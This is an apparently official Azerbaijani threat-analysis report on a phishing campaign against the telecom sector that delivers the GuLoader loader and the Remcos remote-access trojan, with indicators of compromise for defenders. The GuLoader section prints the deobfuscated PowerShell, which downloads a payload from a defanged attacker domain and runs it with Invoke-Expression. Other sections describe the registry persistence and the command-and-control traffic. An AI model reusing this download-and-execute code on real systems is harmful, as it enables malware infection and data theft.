Telekommunikasiya sektoruna
hədəflənmiş hücum cəhdinin araşdırılması üzrə
HESABAT
MÜNDƏRİCAT
“GULOADER” ZƏRƏRLİ PROQRAM TƏMİNATININ TƏHLİLİ
“REMCOS” ZƏRƏRLİ PROQRAM TƏMİNATININ TƏHLİLİ
Hesabat, 07.11.2025-ci il tarixində Elektron Təhlükəsizlik Xidmətinin (bundan sonra - Xidmət) əməkdaşlarının telekommunikasiya sektoruna qarşı yönəlmiş fişinq üsulu ilə kiberhücum cəhdi ilə bağlı aparılmış tədqiqatın nəticələrini ehtiva edir.
Xidmətin əməkdaşları aşkarlanmış zərərli proqram təminatı üzərində tərsinə mühəndislik (proqramın davranışını anlamaq və onun komponentlərini müəyyən etmək məqsədilə aparılan təhlil) əməliyyatları həyata keçirmiş, nəticədə əlavə indikatorlar (“IoC”) müəyyən etmiş və hücum mənbəyi ilə bağlı infrastruktur aşkar etmişdir.
Hücum cəhdində ilkin olaraq “GuLoader” adlı “loader” (yəni, zərərli proqram təminatının hədəf kompüter sisteminə yüklənilməsi üçün istifadə olunan proqram təminatı) və “Remcos” adlı zərərli proqram təminatları istifadə edilmişdir.
“GuLoader” zərərli proqram təminatının Operatoru (bundan sonra Operator) tərəfindən öncədən müəyyən edilmiş zərərli kodu yaddaşa yükləyir, “Remcos” isə “Command and Control (C2)” (yəni, Əmr və İdarəetmə) funksionallığı təmin edən “Remote Access Trojan” olaraq çıxış edir. “Remcos” sistemdə qalıcılıq imkanları yaradır, Operator tərəfindən gələn əmrləri icra edir, uzaqdan idarəetmə və məlumat oğurlama xüsusiyyətlərinə malikdir. Hücumun sxematik təsviri aşağıdakı kimidir:
Şəkil 1. Hücum cəhdinin sxematik təsviri.
QİYMƏTLƏNDİRMƏ
Xidmət tərəfindən aparılmış monitorinq nəticəsində məlum olmuşdur ki, “Guloader” və “Remcos” tipli zərərli proqram təminatları vasitəsilə həyata keçirilən eyni ssenarili hücum cəhdləri ilk dəfə 22.10.2025-ci il tarixində qeydə alınmışdır.
Təhlil olunan məlumatlar əsasında hər hansı konkret təhdid aktoru təyin etmək üçün yetərli sübut mövcud deyil, lakin xüsusi hazırlanmış fişinq məktubları, məzmunun lokallaşdırılması (fayl adları və e-poçt məktubları) hücum cəhdinin məqsədyönlü şəkildə həyata keçirildiyini ehtimalını artırır.
TEXNİKİ DETALLAR
GÖNDƏRİLMİŞ E-POÇT
İlkin olaraq hədəfə e-poçt vasitəsilə müqavilə və ya ödəniş mövzusunda məktublar göndərilir. Xidmət tərəfindən araşdırılan hücum cəhdində hədəfə “Billurdentmqavile.docx111025.bat.zip” adlı arxiv faylı göndərilir:
Şəkil 2. Hədəfə göndərilmiş e-poçt.
Şəkil 3. “PDF” faylın məzmunu.
“GULOADER” ZƏRƏRLİ PROQRAM TƏMİNATININ TƏHLİLİ
Göndərilən arxiv açıldıqda “Billur dent müqavil.pdf” adlı “PDF” uzantılı fayl yüklənilir. “PDF”-in içərisində yerləşdirilmiş “URL” keçid vasitəsilə “Billur dent müqavile.docx 111025.7z” adlı arxiv yüklənir. Sözügedən “7z” arxivindən “Billur dent müqavile.docx 111025.bat” adlı “batch” faylı çıxarılır və həmin fayl icra olunduqda obfuskasiya olunmuş “PowerShell” əmri işə düşür:
Şəkil 4. İcra olunan “PowerShell” əmri
“PowerShell” əmri təhlil edildikdə “Granulated” adlı funksiya aşkar olunur. Bu funksiya 3-cü indeksdən başlayaraq zəncirdə hər 4-cü simvolu çıxarır və onları ardıcıl şəkildə birləşdirərək gizlədilmiş mətni bərpa edir. Məqsəd obfuskasiya olunmuş mətnlərdəki əmrləri əldə etməkdir:
powershell.exe -windowstyle hidden
fl;
function Granulated ($terminen='topografiskes')
{
$preexecuted=3;
do {
$grillbarers+=$terminen[$preexecuted];
$preexecuted+=4;
fl
}
until (!$terminen[$preexecuted])
$grillbarers
}
Bu funksiya vasitəsilə skriptin qalan məzmunu tam deobfuskasiya olunur və icra olunan əmrlər sırası qurula bilir.
Əmr ilkin olaraq “ServicePointManager.SecurityProtocol” parametrində “TLS 1.2”-dən istifadə edərək bütün veb sorğuların bu protokolla həyata keçirilməsini təmin edir:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Daha sonra “garagedoorsinstallations[.]com” adresində yerləşən “Kattepiner.msi” adlı faylı yükləmək üçün yükləmə ünvanı və istifadəçi agenti təyin edilir və “WebClient” sinifindən istifadə edilərək sözügedən faylı yükləyir. Yüklənən fayl “Microrelief.dvl” adlandırılaraq istifadəçinin “%APPDATA%” qovluğuna əlavə olunur:
$downloadUrl = ' https[:]//garagedoorsinstallations[.]com/Kattepiner.msi'
$userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0'
$targetPath = Join-Path $env:AppData 'Microrelief.dvl'
$webclient = New-Object System.Net.WebClient
$webclient.Headers['User-Agent'] = $userAgent
$webclient.DownloadFile($downloadUrl, $targetPath)
Əmrin növbəti hissəsində faylın yerləşdiyi qovluq davamlı şəkildə yoxlanılır və fayl mövcud olmadığı halda sistem avtomatik olaraq onu ilkin yükləmə ünvanından yenidən yükləməyə cəhd edir:
while (-not (Test-Path $targetPath)) {
$webclient.DownloadFile($downloadUrl, $targetPath)
[Threading.Thread]::Sleep(3750)
}
Fayl aşkar edildikdən sonra onun məzmunu “Base64” formatından dekodlaşdırılır və müəyyən başlanğıc indeksdən seçilmiş hissə ($startIndex = 313400) çıxarılaraq “Invoke-Expression” əmri vasitəsilə icra edir:
$base64content = Get-Content $targetPath
$bytes = [System.Convert]::FromBase64String($base64content)
$asciiText = [Text.Encoding]::ASCII.GetString($bytes)
$startIndex = 313400
$length = 29739
$payloadCode = $asciiText.Substring($startIndex, $length)
Invoke-Expression $payloadCode
Həmin fayldan çıxarılan skriptin əvvəlki faylda istifadə edilmiş “Granulated” funksiyası ilə obfuskasiya olunmuş parçalardan və çoxlu kodlaşdırılmış “hexadecimal” dəyərlərindən ibarət olduğu müəyyən edilir:
Şəkil 5. Yüklənən fayldan çıxarılan kodlaşdırılmış skript
İlkin olaraq təyin olunmuş funksiya ilə deobfuskasiya aparıldıqdan sonra müəyyən edilir ki, digər hissədəki “hexadecimal” dəyərlər “F6” açarı tətbiq olunmaqla “XOR” alqoritmi vasitəsilə kodlaşdırılmışdır:
Şəkil 6. “base64”-dən deobfuskasiya.
Şəkil 7. “XOR” əməliyyatın həyata keçirilməsi.
“REMCOS” ZƏRƏRLİ PROQRAM TƏMİNATININ TƏHLİLİ
Zərərli proqram təminatı çalışdıqdan sonra 185[.]208[.]180[.]170 IP ünvanından “HDXAiYgfoimbFe3.bin” faylı yüklənilir və “msiexec.exe” prosesinə yeridilir:
Şəkil 8. “.bin” faylın yüklənilməsi.
“msiexec.exe” prosesinin icra edilməsi:
Şəkil 9. Proseslərin işə düşmə ardıcıllığı.
Zərərli proqram təminatı sistemdə qalıcılığı təmin etmək məqsədilə 2 fərqli reyestr dəyərini yaradır:
Şəkil 10. “Epithets” adlı dəyərin yaradılması.
Şəkil 11. “Startup key” adlı dəyərin yaradılması.
Yuxarıda göstərilən dəyərlər aşağıdakı məqsədlərə xidmət edir:
- “Computer\HKEY_CURRENT_USER\SOFTWARE\Olivil179” – zərərli kod;
- “Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key\” – reyestrında “Olivil179” altında yer almış, “Epithets” dəyərin içərisində olan kodun icrası.
İşə salınmış proses 172[.]111[.]213[.]69 “IP” ünvanının 12760 portuna sorğu göndərir:
Şəkil 12. Prosesin zərərli IP ünvanı ilə əlaqə qurması.
Aparılan təhlil nəticəsində məlum olmuşdur ki, sistemdə fəaliyyət göstərən zərərli proqram Əmr və İdarəetmə serverinə müxtəlif sistem məlumatlarını ötürür:
Şəkil 13. “Əmr və İdarəetmə” serverinə göndərilmiş məlumatlar.
Ötürülmüş məlumatlar sırasına aşağıdakılar daxildir:
- İstifadəçi adı;
- Əməliyyat sisteminə dair məlumatlar;
- Prosessor məlumatları;
- “Remcos” proqram təminatının versiyası;
- İstifadəçi tərəfindən mübadilə buferinə əlavə edilmiş dəyərlər.
Zərərli proqram təminatı tərəfindən ötürüləcək məlumatlar “%APPDATA%” qovluğunda “lkrggaptsb.dat” adlı faylın içərisində yer alır.
Şəkil 14. “lkrggaptsb.dat” adlı fayl.
Şəkil 15. Əmr və İdarəetmə serverinə göndərilən məlumatlar.
Analiz nəticəsində müəyyən olunub ki, faylın quruluşu “Remcos” adlı, “Remote Access Trojan (RAT)” tipli zərərli proqram təminatlara məxsus xüsusiyyətlərə malikdir.
İNDİKATORLAR
07.11.2025 tarixinə olan indikatorlar aşağıdakı cədvəldə təqdim edilmişdir. Bundan əlavə, bu indikatorlar Xidmət tərəfindən aktiv şəkildə istifadə olunan “misp.cert.az” - “İnsident Məlumatlarının Mübadiləsi Platforması”-na da əlavə edilmişdir. “Remcos RAT” zərərli proqramı ilə əlaqəli fəaliyyətlərdə hər hansı dəyişiklik müşahidə edildikdə, yeni indikatorların yuxarıda qeyd olunan sistemə əlavə olunması nəzərdə tutulmuşdur.
|
Fayl adı |
Heş dəyəri |
|
Billur dent m_qavile.bat |
9f7e88ddd7a74ba3fb2cd5c858d5a864e8dc640df11724daba3d31132de5eb4f |
|
lkrggaptsb.dat |
f419155217beb128707356c15b3bf49ac208b8e2aa61fca2270fee54f7ac4d61 |
|
Kattepiner.msi |
2a63505530d7a01bfab3a931b3b6c2e6b721748b6547bb56365420474088a0ca |
|
HDXAiYgfoikmbFe3.bin |
5f25e9afaf31abd7fbab5bc2e8e7c3d2eef45f08d9b8e7a84bc2f2a04175c6f7 |
|
Microrelief.dvl |
2a63505530d7a01bfab3a931b3b6c2e6b721748b6547bb56365420474088a0ca |
|
Billur dent müqavile.docx 111025.7z |
8acece639526b29e2f1c587736f8efa0020a321a6e0a8a580c163c9403e9489b |
|
Billur dent müqavile.docx 111025.pdf |
b2497e7d4115aa8ac29261a43256e3334aefef3ff110204f7004f36936167a52 |
|
Şəbəkə indikatorları |
|
192[.]185[.]183[.]10 |
|
172[.]111[.]213[.]69 |
|
194[.]181[.]228[.]25 |
|
garagedoorsinstallations[.]com |
|
fteamez7iurs02[.]duckdns[.]org |
|
fteamez7iurs03[.]duckdns[.]org |
|
fteamez7iurs04[.]duckdns[.]org |
|
fteamez7iurs05[.]duckdns[.]org |
|
bafybeibcoqdkc7girsihkj6nll2i3gt6xrtofvitlr3p7qpx3fvz6pxbgu[.]ipfs[.]w3s[.]link |
|
kociszew[.]webd[.]pl |
|
canigrup[.]top |
|
Reyestr indikatorları |
|
Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key\ |
|
Computer\HKEY_CURRENT_USER\SOFTWARE\Olivil179 |